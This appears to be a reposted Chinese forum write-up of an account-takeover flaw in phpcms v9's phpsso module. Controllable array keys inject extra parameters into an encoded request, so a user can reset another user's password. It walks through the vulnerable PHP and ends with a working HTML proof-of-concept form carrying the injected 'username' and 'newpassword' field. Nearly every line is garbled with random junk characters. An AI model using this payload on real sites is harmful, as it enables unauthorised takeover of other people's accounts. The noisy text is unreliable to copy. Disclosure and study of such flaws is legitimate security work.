提到的通行证的代码:6 d: U* j3 q) s# v; [
) ^+ n E, O" o C0 e. H g& J. \# B" z/ |" K3 }$ E& e' Z
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
3 t* X( x \ M- ]* T. l
; k+ V' d3 \. X8 q在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
: b; k( R* C( t& C6 Z) E+ r" o" ?1 |( {7 i
我把它留给了你们。
7 T6 F3 W0 R V7 M6 Y' M不知道你们发现了它没有。
8 ^7 D' Q" h: j; f
J% k" G8 k4 S" r- c我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。2 @2 y r) S+ L7 E+ N( H6 Y k, c
" I# v' q& J; O% U" y9 i
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
& c; ]9 a4 y g7 c% Z3 {
* t' v- ^, l9 t) {. }也就是/ g J; w; g, a
0 S( N& {- Q: ]) }, N
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。! m( k+ l/ k h% ^+ R2 j: [
. a2 n [6 j% B0 I要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
B% U! F9 Y6 ?, U8 D: X/ {9 M7 ]' B- _$ q9 Y
* _0 e: L8 g4 C# |5 V1 k1 n
其实我们有这样的机会,看看代码,如下:
`' m; f/ W3 B+ g7 v5 ?. `* I3 @; }8 j- O( ~5 I" h
9 R# [; F7 M% I. q) \public function auth_data($data) {3 Z: X3 s; u: [' Y
$s = $sep = '';
- z, I x" h7 t3 _3 G foreach($data as $k => $v) {
5 d3 B0 b0 F8 K6 W6 V$ r if(is_array($v)) {1 E3 A2 n# G0 d5 \- V+ L
$s2 = $sep2 = '';! T1 a- N: f% n/ G. k
foreach($v as $k2 => $v2) {( p6 g6 H! s- y u! S! P
$s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
, d, M7 j5 ?$ Q* z $sep2 = '&';; C v7 V. N/ w) v
}
/ C: w" @6 F6 Q" B0 s. @& I $s .= $sep.$s2;3 E0 J, t. o* A# V- n8 b( [- @9 a1 c% C
} else {
9 l9 z7 a+ e) Z# ]2 M9 c $s .= "$sep$k=".$this->_ps_stripslashes($v);
7 Y9 o3 d5 t1 A$ G4 c }. L) g8 f; E( U; d7 Q+ T
$sep = '&';
, t0 ]* |: R( Z7 I }
) z$ I+ ~# o a2 z- k, _3 P S
2 o$ g/ V" r: w* a5 f5 @* x $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
' n: e0 M- z" K5 Z8 a) s5 Q; r return $auth_s;3 t1 G$ G# {/ j: K/ K7 X) L+ _; l
}
7 E% i' t! P- ~. X5 P" d u, a5 P# r0 B, v, m
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
$ r7 F* y' @! |" J J/ n( t5 | q2 c3 N$ y( u
举个例子
! t8 ^3 l5 |, p$ L7 Q. Y3 W2 q& ^- H3 ?- ?3 j- c" }
$a[aaa=a&bbb] = 'a';) {! U: [6 J8 Q0 t$ }
# Q# D# a- D7 E- p& S$ P+ u/ o+ E" d
会变成aaa=a&bbb=a0 t2 C( `/ i9 r5 x9 @# U
( G/ i7 [% t. l% }明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
- l/ r" a7 M9 T+ M: q
4 u4 }8 b+ J2 C这个时候,我们可以再去看一个函数。& @6 y$ Z {8 L; {
( n4 U$ o ]0 l; F, f) {( a就在这个文件内:
! D, |/ R" L* S; K @/ }0 y, g! B+ O, i- l" i
' \+ R7 c) Z$ r9 t; w1 G2 q% opublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
+ N; Q0 |+ F; J; H if($email && !$this->_is_email($email)) { l1 g' h- j' Z- N( E& _8 H; h
return -4;* }' @5 R. ^. i7 _. \% f
}
9 R! n- n5 c7 j4 [ return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
5 `, c6 _5 n) v; b }
9 M% k; V0 q `1 x: Q' \/ L( t5 ~, `
I; G0 u) E) n这是向通行证发了这样一个请求。" \) p6 ^ o: G/ T, ^. G8 z8 w
- H, r1 q# `; K8 t) M我们再跟到通信证代码里去看看,就会有所发现。: m8 k9 r' [; D
# H: y" B+ H0 w7 a8 J0 B( a* d
( a$ c3 j1 d$ \1 |public function edit() {
1 J, Y7 ]" w0 E) d& k2 K5 H% S1 _//能省就省,太长了不是吗?" p6 g& N3 v1 u5 A) J9 P$ T" U8 L
& i3 \0 }$ ` k$ m# J2 l ~4 _6 K! A
if($this->username) {
8 d. [; e; L6 r# e//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。+ v; d) W# E5 v9 ~ ?
$res = $this->db->update($data, array('username'=>$this->username));
4 _4 a' D; h6 ~/ g, \5 d) L } else {7 Z! d) l4 j6 v4 ]- M' v6 Z6 e4 |- b6 i2 u
file_put_contents('typeb.txt',print_r($data,1).$this->uid);
% x: [8 z& r6 H) ~6 y% ~3 l0 N. I9 S $res = $this->db->update($data, array('uid'=>$this->uid));1 y4 F; i3 e6 I
}: k0 o# I1 J2 v, R% P, A( m
! z5 `- a; v- x8 R5 r3 N0 F好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:7 ~8 ?: g$ ]& g( k
+ N" J/ Y; U) G* ]% ^
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
$ h- i1 j0 U1 k7 z; ^
3 Z% t% f+ p9 c+ t8 E6 g! h' i9 _很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。/ H: E# y" W3 e" l K% t a
* W7 G& \" C! y我当然找到了:3 ^) f1 a( n6 a( V
phpcms9/phpcms/modules/member/index.php
1 T$ Z0 E0 X# p1 X/ m
/ |6 {+ m! O2 h: }! }0 _$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
/ [& ~ U0 z( `6 p, J" h. K# R. c! P) O% t% g. N: f
然后就没有然后了。
3 q/ N- m* Q6 x! J. P
K/ m# z0 F" w* |; B0 Q<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
i% g; X& i2 D: Y6 d3 b <table width="100%" cellspacing="0" class="table_form">
$ Q9 L8 f$ L# J <tr>
+ t/ t- K7 R* V9 k! V& a: x <th width="80">邮箱:</th>
G$ f/ J+ }' U% w F4 r! {1 K <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>( m. R6 V) i3 P& D8 U: J8 b
</tr>
2 M' m, o9 _- i5 d <tr>
. D! B2 X! D. x) u <th width="80">原密码:</th>
8 e- X# m7 T, f" R q, O <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td> J" T/ v; r( k1 J4 q- n" V
</tr>: [ X5 s5 D7 i7 Y8 J. K
<tr>6 W" g. @9 v' `9 b0 v% r
<th>新密码:</th>
- ]8 F; H2 ?9 D$ S <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
$ j9 w1 V! U% z) B4 O </tr>0 |5 C, K+ B: ?$ r9 Y5 t5 ]8 l9 L
<th></th>, }2 w7 o: w) w( J7 W& i
<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>) G! ]0 e2 a3 [2 g0 [
</tr>% A+ f" _% G/ ^: Y; |# F
</table>, E' e' u0 T# [: W& f# ]/ \
|5 d9 j9 @0 a8 B- m
- n1 P% {1 }% l6 f </form>7 |, T4 c' {. N; S
|